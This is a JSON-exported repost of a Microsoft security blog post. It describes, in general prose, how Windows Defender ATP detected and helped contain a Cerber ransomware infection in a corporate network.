{"id":6423,"date":"2017-01-30T03:00:36","date_gmt":"2017-01-30T11:00:36","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/30\/news-260\/"},"modified":"2017-01-30T03:00:36","modified_gmt":"2017-01-30T11:00:36","slug":"news-260","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/30\/news-260\/","title":{"rendered":"Averting ransomware epidemics in corporate networks with Windows Defender ATP"},"content":{"rendered":"

Microsoft security researchers continue to observe ransomware<\/a> campaigns blanketing the market and indiscriminately hitting potential targets. Unsurprisingly, these campaigns also continue to use email and the web as primary delivery mechanisms. Also, it appears that most corporate victims<\/a> are simply caught by the wide nets cast by ransomware operators. Unlike cyberespionage groups, ransomware operators do not typically employ special tactics to target particular organizations.<\/p>\n

Although indiscriminate ransomware attacks are very much like commodity malware infections, the significant cost that can result from a broad ransomware attack justifies consideration of a layered, defense-in-depth strategy that covers protection, detection, and response. As attacks reach the post-breach or post-infection layer\u2014when endpoint antimalware fails to stop a ransomware infection\u2014enterprises can benefit from post-breach detection solutions that provide comprehensive artifact information and the ability to quickly pivot investigations using these artifacts.<\/p>\n

Our research into prevalent ransomware families reveals that delivery campaigns can typically stretch for days or even weeks, all the while employing similar files and techniques. As long as enterprises can quickly investigate the first cases of infection or \u2018patient zero\u2019, they can often effectively stop ransomware epidemics. With Windows Defender Advanced Threat Protection<\/a> (Windows Defender ATP), enterprises can quickly identify and investigate these initial cases, and then use captured artifact information to proactively protect the broader network.<\/p>\n

In this blog, we take a look at an actual Cerber ransomware<\/a> infection delivered to an enterprise endpoint by a campaign that ran in late November 2016. We look at how Windows Defender ATP, in the absence of endpoint antimalware detections, can flag initial infection activity and help enterprises stop subsequent attempts to infect other devices.<\/p>\n

Detecting Cerber ransomware behavior<\/h2>\n

In an earlier blogpost<\/a>, we described how the Cerber ransomware family has been extremely active during the recent holiday season. It continues to be one of the most prevalent ransomware families affecting enterprises as shown in Figure 1. Not only are there similarities between members of this well-distributed ransomware family, certain Cerber behaviors are common malware behaviors. Detecting these behaviors can help stop even newly distributed threats.<\/p>\n

\"Ransomware<\/p>\n

Figure 1. Ransomware enc<\/i>ounters on enterprise endpoints<\/i><\/p>\n

 <\/p>\n

A real case of Cerber meeting Windows Defender ATP<\/h3>\n

The Cerber ransomware infection started with a document downloaded into the Downloads<\/em> folder through a webmail client. A user opened the document and triggered an embedded macro, which in turn launched a PowerShell command that downloaded another component carrying the ransomware payload. As shown below, the PowerShell command was detected by Windows Defender ATP.<\/p>\n

\"PowerShell<\/p>\n

Figure <\/em>2<\/em>. PowerShell command detection<\/em><\/p>\n

 <\/p>\n

Windows Defender ATP also generated an alert when the PowerShell script connected to a TOR anonymization website through a public proxy to download an executable. Security operations center (SOC) personnel could use such alerts to get the source IP and block this IP address at the firewall, preventing other machines from downloading the executable. In this case, the downloaded executable was the ransomware payload.<\/p>\n

\"Alert<\/p>\n

Figure <\/em>3<\/em>. Alert for the TOR website connection showing the source IP address<\/em><\/p>\n

 <\/p>\n

After the payload was downloaded into the Temp<\/em> directory, it was then executed by a parent cmd.exe<\/em> process.\u00a0 The payload created a copy of itself in the Users<\/em> folder and then launched that copy. Machine learning algorithms in Windows Defender ATP were able to detect this self-launching behavior.<\/p>\n

\"Ransomware<\/p>\n

Figure <\/em>4<\/em>. Ransomware launching copy of itself as detected on Windows Defender ATP<\/em><\/p>\n

 <\/p>\n

Just prior to encrypting files, the Cerber ransomware tried to prevent future attempts at file recovery by deleting system restore points and all available volume shadow copies\u2014these are used by Windows System Restore and Windows Backup and Restore during recovery. This hostile behavior was also detected by Windows Defender ATP.<\/p>\n

\"Deletion<\/p>\n

Figure <\/em>5<\/em>. Deletion of volume shadow copies<\/em><\/p>\n

 <\/p>\n

Breadth and depth of alerts enable easy scoping and containment<\/h3>\n

Windows Defender ATP generated at least four alerts during the infection process, providing a breadth of detections that provides coverage for changing techniques between Cerber versions, samples, and infections instances. To build up the mechanisms behind these alerts, Microsoft security researchers comb through ransomware families and identify common behaviors. Their research supports machine learning models and behavioral detection algorithms that detect ransomware at different stages of the kill chain, during delivery (by email or using exploit kits) up to the point when victims make ransom payments.<\/p>\n

\"Alerts<\/p>\n

Figure <\/em>6<\/em>. Alerts that correspond to different kill stages<\/em><\/p>\n

 <\/p>\n

Each alert provides additional context about the attack. In turn, SOC personnel can use this contextual information to pivot an investigation and get insights from endpoints across the organization. Using the provided file and network activity information, pivoting investigations in the Windows Defender ATP console can provide conclusive leads, even when no actual ransomware payload is detonated.<\/p>\n

To investigate our Cerber case, we use the name of the payload file hjtudhb67.exe<\/em>, which is clearly unusual and not likely used by legitimate executables. A quick search on the Windows Defender ATP console yields 23 other files with the same name. The files were suspiciously created in a span of approximately 10 days and scattered across endpoints in the organization. (Note that although most of these files are artifacts from the actual infection, some are possibly remnants of tests by SOC personal who responded to the alerts.)<\/p>\n

\"Instances<\/p>\n

Figure <\/em>7<\/em>. Instances of file with the same unusual name as the ransomware<\/em><\/p>\n

 <\/p>\n

We pivot to the source IP that hosted the payload file and perform a search to reveal that 10 machines connected to this IP address. Blocking this source IP on the corporate firewall on the day of the first infection could have helped prevent the Cerber ransomware payload file from reaching other machines.<\/p>\n

Conclusion: Defense-in-depth with Windows Defender ATP<\/h2>\n

We have seen how Windows Defender ATP provides enterprise SOC personnel with a powerful view of events and behaviors associated with a ransomware infection, from the time of initial delivery and throughout the installation process. Enterprise SOC personnel are able to understand how ransomware has reached an endpoint, assess the extent of the damage, and identify artifacts that can be used to prevent further damage. These capabilities are made possible by cloud analytics that continuously search for and flag signs of hostile activity, including signs that could have been missed in other defensive layers.<\/p>\n

Upcoming enhancements to Windows Defender ATP with the Windows 10 Creators Update<\/a> will take its capabilities one step further by enabling network isolation of compromised machines. The update will also provide an option to quarantine and prevent subsequent execution of files.<\/p>\n

Windows Defender ATP is built into the core of Windows 10 Enterprise and can be evaluated free of charge<\/a>.<\/p>\n

Windows 10 security against Cerber ransomware<\/h3>\n

Windows 10 is built with security technologies that can help detect the latest batch of Cerber ransomware.<\/p>\n